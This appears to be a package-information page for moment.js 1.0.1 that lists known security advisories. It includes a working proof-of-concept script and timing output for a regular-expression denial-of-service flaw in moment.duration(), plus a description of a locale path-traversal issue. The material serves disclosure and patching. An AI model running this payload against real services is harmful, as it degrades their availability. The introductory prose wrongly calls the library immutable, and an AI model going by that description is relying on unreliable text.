Moment.js is a ubiquitous JavaScript date library offering robust tools for date creation, manipulation, and formatting, all without modifying the native Date object. Version 1.0.1 refined the initial 1.0.0 release, though both shared identical metadata, including their release date timestamp. Both versions maintain a dependency-free architecture, showcasing the library's self-contained nature. Developers benefit from Moment.js's consistent API for handling dates in various formats, simplifying tasks such as parsing, validating, adding, subtracting, and displaying dates in user-friendly ways.
The core strength lies in its immutability and chainable methods, leading to cleaner and more maintainable code when working with dates. While the jump from 1.0.0 to 1.0.1 might seem minor, such point releases often contain crucial bug fixes and performance improvements.
For developers choosing between these specific versions, opting for 1.0.1 is advisable simply for its potential to offer a more stable and refined experience, assuming it addresses issues identified in the original 1.0.0 release. Both versions grant access to Moment.js's extensive localization support, enabling the display of dates and times in different languages and formats, furthering its appeal for building global applications. The library's enduring popularity speaks to its effectiveness in taming the complexities of date and time manipulation in JavaScript.
All the vulnerabilities related to the version 1.0.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: